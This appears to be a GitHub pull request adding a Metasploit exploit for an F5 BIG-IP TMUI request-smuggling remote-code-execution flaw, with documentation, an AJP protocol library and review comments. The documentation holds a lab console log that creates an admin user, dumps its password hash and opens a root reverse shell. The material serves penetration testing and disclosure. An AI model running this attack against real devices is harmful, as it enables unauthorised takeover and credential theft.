Add Exploit For CVE-2023-46747 (F5 TMUI AJP Smuggling RCE) #18497

Merged Nov 2, 2023 (9 commits)
Expand Up @@ -52,11 +52,11 @@ Defaults to `/tmp`.
### F5 BIG-IP 14.1.2 in VMware Fusion

```
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options

Module options (exploit/linux/http/f5_bigip_tmui_rce):
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902):

Name Current Setting Required Description
---- --------------- -------- -----------
Expand Down Expand Up @@ -87,11 +87,11 @@ Exploit target:
1 Linux Dropper


msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179
rhosts => 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
@@ -0,0 +1,76 @@
## Vulnerable Application

### Description

This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
execute a command payload.

Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.

### Setup

Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.

The target does not need to be licensed to be vulnerable.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
4. Set the `RHOST`, `PAYLOAD` and payload-related options
5. Do: `run`
6. You should get a shell.

## Targets

### Command

This executes an OS command on the target device.

## Options

## Scenarios

### F5 BIG-IP 17.0.0.1-0.0.4

```
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
RHOSTS => 192.168.159.32
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.159.32:443 - The target is vulnerable.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
[*] Sending stage (24768 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : f5test2.home.lan
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/var/service/restjavad
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
Credentials
===========

host origin service public private realm private_type JtR Format cracked_password
---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt

msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) >
```
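Review bot: step 4 of the Verification Steps names `RHOST`, while the scenario below sets `RHOSTS`; the option the module actually reads is `RHOSTS`, so the step should be corrected to match. The `## Options` heading is left empty and the `### Command` target section says only that it executes an OS command; either list the module's options or drop the empty heading. Since the description says the module creates an administrative user and the scenario shows `Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS`, the documentation should also state whether that account is removed once the session is established, so operators know what is left on the device.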
128 changes: 128 additions & 0 deletions lib/rex/proto/apache_j_p.rb
@@ -0,0 +1,128 @@
# -*- coding: binary -*-

require 'bindata'

# @see: https://tomcat.apache.org/tomcat-3.3-doc/ApacheJP.html
module Rex::Proto::ApacheJP
class ApacheJPBoolean < BinData::Primitive
endian :big

uint8 :data

def get
self.data != 0
end

def set(v)
self.data = v ? 1 : 0
end
end

class ApacheJPString < BinData::Primitive
endian :big

uint16 :len, value: -> { data.length }
stringz :data

def get
self.data
end

def set(v)
self.data = v
end
end

class ApacheJPReqHeaderName < BinData::Primitive
COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent }
endian :big

uint16 :len_or_code
stringz :data, onlyif: -> { len_or_code < 0xa000 }

def get
if len_or_code >= 0xa000
COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1]
else
self.data
end
end

def set(v)
if (idx = COMMON_HEADERS.index(v))
self.len_or_code = 0xa000 | (idx + 1)
else
raise RuntimeError if v.length >= 0xa000

self.len_or_code = v.length
self.data = v
end
end
end

class ApacheJPRequestHeader < BinData::Record
endian :big

apache_jp_req_header_name :header_name
apache_jp_string :header_value
end

class ApacheJPRequestAttribute < BinData::Record
CODE_CONTEXT = 1
CODE_SERVLET_PATH = 2
CODE_REMOTE_USER = 3
CODE_AUTH_TYPE = 4
CODE_QUERY_STRING = 5
CODE_JVM_ROUTE = 6
CODE_SSL_CERT = 7
CODE_SSL_CIPHER = 8
CODE_SSL_SESSION = 9
CODE_REQ_ATTRIBUTE = 10
CODE_TERMINATOR = 0xff

endian :big

uint8 :code
apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR }
end

# @see: https://tomcat.apache.org/tomcat-3.3-doc/ApacheJP.html#prefix-codes
class ApacheJPForwardRequest < BinData::Record
HTTP_METHOD_OPTIONS = 1
HTTP_METHOD_GET = 2
HTTP_METHOD_HEAD = 3
HTTP_METHOD_POST = 4
HTTP_METHOD_PUT = 5
HTTP_METHOD_DELETE = 6
HTTP_METHOD_TRACE = 7
HTTP_METHOD_PROPFIND = 8
HTTP_METHOD_PROPPATCH = 9
HTTP_METHOD_MKCOL = 10
HTTP_METHOD_COPY = 11
HTTP_METHOD_MOVE = 12
HTTP_METHOD_LOCK = 13
HTTP_METHOD_UNLOCK = 14
HTTP_METHOD_ACL = 15
HTTP_METHOD_REPORT = 16
HTTP_METHOD_VERSION_CONTROL = 17
HTTP_METHOD_CHECKIN = 18
HTTP_METHOD_CHECKOUT = 19
HTTP_METHOD_UNCHECKOUT = 20
HTTP_METHOD_SEARCH = 21

endian :big

uint8 :prefix_code, value: 2
uint8 :http_method
apache_jp_string :protocol, initial_value: 'HTTP/1.1'
apache_jp_string :req_uri
apache_jp_string :remote_addr
apache_jp_string :remote_host
apache_jp_string :server_name
uint16 :server_port, initial_value: -> { is_ssl ? 80 : 443 }
apache_jp_boolean :is_ssl, initial_value: false
uint16 :num_headers, initial_value: -> { headers.length }
array :headers, type: :apache_jp_request_header, initial_length: :num_headers
array :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR }
end
end
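Review bot: `uint16 :server_port, initial_value: -> { is_ssl ? 80 : 443 }` in `ApacheJPForwardRequest` has the ports inverted; an SSL request should default to 443 and a plain one to 80, so this should read `is_ssl ? 443 : 80`. The `read_until` lambda on the `attributes` array references `ApacheJPRequestAttribute::TERMINATOR`, but the constant defined in that class is `CODE_TERMINATOR`, so reading a forward request would raise `NameError`; use `ApacheJPRequestAttribute::CODE_TERMINATOR`. In `ApacheJPRequestAttribute`, the `CODE_REQ_ATTRIBUTE` (0x0A) attribute in the referenced AJP protocol carries a name string followed by a value string, while the record models every non-terminator attribute as a single `attribute_value`, so generic request attributes will not round-trip; either add an `onlyif`-guarded `attribute_name` field for code 10 or document that 0x0A is unsupported. Minor: `raise RuntimeError if v.length >= 0xa000` in `ApacheJPReqHeaderName#set` should carry a message explaining the header-name length limit, and a comment on `ApacheJPString` noting that `len` is computed on write only (the `stringz` field is read up to its null terminator, not bounded by `len`) would help the next reader.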
Expand Up @@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::Deprecated
moved_from 'exploit/linux/http/f5_bigip_tmui_rce'
👍


def initialize(info = {})
super(